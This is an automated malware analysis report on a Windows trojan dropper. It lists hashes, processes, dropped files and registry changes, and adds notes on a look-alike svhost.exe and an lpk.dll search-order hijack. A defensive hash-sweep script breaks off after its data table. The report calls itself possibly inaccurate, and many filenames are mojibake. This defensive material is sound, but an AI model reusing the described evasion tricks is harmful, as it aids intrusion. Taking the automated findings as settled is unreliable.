Trojan-Dropper.Win32.Agent.exc (Kaspersky), Trojan.Crypt.CG (B) (Emsisoft), Trojan.Crypt.CG (AdAware), mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, EmailWorm
This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 6ad50ea838fbe4371dd28acf92999eb0
SHA1: 73dd9b7a3b7123679b163bfa9b84cdd8924fc46b
SHA256: d19774911f2545e18c919a335d625a591fc0a9aa4873ea97c3efacacd3c9880c
SSDeep: 49152:4uui0zc7iTcTv1XsYIGjnFtuRB0m2HjZZgEB4lG3X/t:4Kiw74IQRBE4EB4Q3F
Size: 2494274 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: VideoPerformer
Created at: 2007-04-26 09:56:30
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
This classification comes from the GenericEmailWorm.YR signature match listed above; no e-mail activity is recorded in the dynamic analysis that follows.
Process activity
The Trojan creates the following process(es):
i.exe:1172
tqrl_90_4090.exe:1308
ws.exe:892
ignite.exe:428
ignite.exe:424
xtsszs_qn2.exe:540
SS540.exe:1688
%original file name%.exe:1660
xtsszs.exe:1484
The Trojan injects its code into the following process(es):
CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324
ignite.exe:432
mankind.exe:528
svhost.exe:628
DL.exe:1984
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process i.exe:1172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (0 bytes)
The process tqrl_90_4090.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÃÂÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-áÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Æßæ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-áѩתÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Àö¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýæ.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÃÂÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-áѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÃÂÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÃÂÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÃÂѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂÂÃâ€ÃƒÂ¶Ã‚±Â¸ÃÂü.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054ÃŽÃÂ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê áÓêתÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ã¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\success (0 bytes)
The process CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dm.dll (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
%System%\regsvr32.exe (300 bytes)
The process ws.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\svhost.exe (601 bytes)
Note that svhost.exe (no "c") is not the legitimate %System%\svchost.exe; the look-alike name is chosen so that the process blends in with the service host processes shown in Task Manager.
The process ignite.exe:428 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\config\systemprofile\Local Settings\Temp\~DF8DF7.tmp (0 bytes)
The process ignite.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)
The process ignite.exe:424 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF76C2.tmp (0 bytes)
The process xtsszs_qn2.exe:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp (0 bytes)
The process SS540.exe:1688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\sszs\uninst.exe (3082 bytes)
%Program Files%\sszs\xtsszsup.exe (8421 bytes)
%Program Files%\sszs\xtsszs.exe (7861 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
%Program Files%\sszs\xtsszs.dll (1568 bytes)
%Program Files%\sszs\mscomctl.ocx (21984 bytes)
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (479 bytes)
%System%\diactss.dll (40 bytes)
%System%\netsh.exe (692 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB9.tmp (0 bytes)
%Program Files%\sszs\xtsszs.dll (0 bytes)
The process %original file name%.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe (17629 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\opeB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeB2.tmp (0 bytes)
The process svhost.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\lpk.dll (601 bytes)
C:\RCXBA.tmp (16516 bytes)
%System%\hra33.dll (7 bytes)
The Trojan deletes the following file(s):
%System%\hra33.dll (0 bytes)
Note: lpk.dll is a Windows system DLL that is loaded by most GUI processes. A copy written outside %System% (here to the drive root) is a DLL search-order hijack: any executable started from that directory loads the dropped lpk.dll instead of the system one, so the file should be treated as a payload rather than as a stray temporary file.
The process xtsszs.exe:1484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF246.tmp (0 bytes)
The process DL.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[2].txt (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
Registry activity
The process CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 D5 6E 19 7D A4 9C 9B 8D 34 11 39 46 B7 C8 7A"
The process %original file name%.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 43 66 F2 15 A7 7E 3F C7 97 91 B1 6D DE DC 3D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"i.exe" = "i"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe" = "易语言程序"
The following values under the Internet Explorer ZoneMap key were set. They correspond to the three check boxes in IE's "Local intranet" sites dialog: with each set to 1, local (intranet) sites not listed in another zone, all UNC network paths, and all sites that bypass the proxy server are placed in the Local intranet zone, which runs with a lower security level than the Internet zone. The Trojan does not map all URLs to the Intranet zone. These three values are also the default state of those check boxes, and the RNG Seed, MountPoints2 and Shell Folders values above are written by CryptoAPI and Explorer as a side effect of any process running, so none of them is a useful indicator on its own:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
90f713db031604705052fa33d384d013 | c:\%original file name%.exe |
ab8c30112e5118117354ffaccdb9b1b2 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace.dll |
a87f0f76cdf059d9809f5401a81dcfc7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace64.dll |
5e732d5af0370a56a94bc00fa9df3d2f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\ignite.exe |
2433e87f0896c200c62f39d9a3917e11 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\kindness.exe |
1b25f550a1c853b1cd221bc5ddf2f823 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\mankind.exe |
7146dfa1e6aaca5924c4626731f96b70 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\time.dll |
ca1e89a61ecf3740067aff25920bb8ca | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uTray.exe |
b5b674a71f910d38972fb8b940104083 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uninst.exe |
1ec9e3a5dd4525a9ee2b1ece8689be84 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7b0\DL.exe |
dcb19b6333cc5227526c9b2cd9c82ffe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CF»Æ¹ÃøÊÓ¸¨Öúv5.6.exe |
4eb47ca672111bfd1e8cd09aef167992 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SOFTWARE.LOG |
eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SS540.exe |
147127382e001f495d1842ee7a9e7912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SkinH_EL.dll |
430f63435575980f70192c4602af8f0b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe |
eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe |
6cee67311716bcacc2ea85e8bf422b63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe |
a2206eb0d5510fc5fdbcf486ce2596a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\i.exe |
430f63435575980f70192c4602af8f0b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tqrl_90_4090.exe |
eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\xtsszs_qn2.exe |
714cf24fc19a20ae0dc701b48ded2cf6 | c:\Program Files\sszs\mscomctl.ocx |
e6d0ac8914358d21e3e5f89566c8ac3c | c:\Program Files\sszs\uninst.exe |
b7b2fe0e404e4fbbc4a10657ac3ab4e3 | c:\Program Files\sszs\xtsszs.exe |
c3f8abc1d2a6ff0ce3630f9d209e1213 | c:\Program Files\sszs\xtsszsup.exe |
cb86a1cbb9e089277f5cfb06f0524e30 | c:\WINDOWS\system32\diactss.dll |
e8889a55641fa57bcb588571f5bcbc63 | c:\WINDOWS\system32\dm.dll |
b4428e0a216fb5fc063a77c3562ccd2d | c:\WINDOWS\system32\hra33.dll |
4eb47ca672111bfd1e8cd09aef167992 | c:\WINDOWS\system32\svhost.exe |
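The "Dropped PE files" table above is most useful as a hash list: the dropper writes renamed copies of the same binaries under several paths (the same MD5 appears for SS540.exe, xtsszs_qn2.exe and xtsszs_qn2[1].exe), so a sweep should match on hash rather than on path. The following Python script is an added example, not part of the Lavasoft report: it parses rows in the table's own "MD5 | File path |" format, walks a directory tree, hashes every file in a streaming fashion and reports hits, skipping files it cannot read instead of aborting (a live infection usually holds some open). The two table rows embedded in it are copied from the report; the planted sample file, its directory and the path "c:\constructed\example.exe" are constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# Two rows copied from the "Dropped PE files" table in the report above.
# Matching is by MD5 only, so a renamed or relocated copy is still caught;
# the path column is kept purely for the report output.
DROPPED_PE_TABLE = """\
MD5 | File path |
---|---|
b4428e0a216fb5fc063a77c3562ccd2d | c:\\WINDOWS\\system32\\hra33.dll |
4eb47ca672111bfd1e8cd09aef167992 | c:\\WINDOWS\\system32\\svhost.exe |
"""


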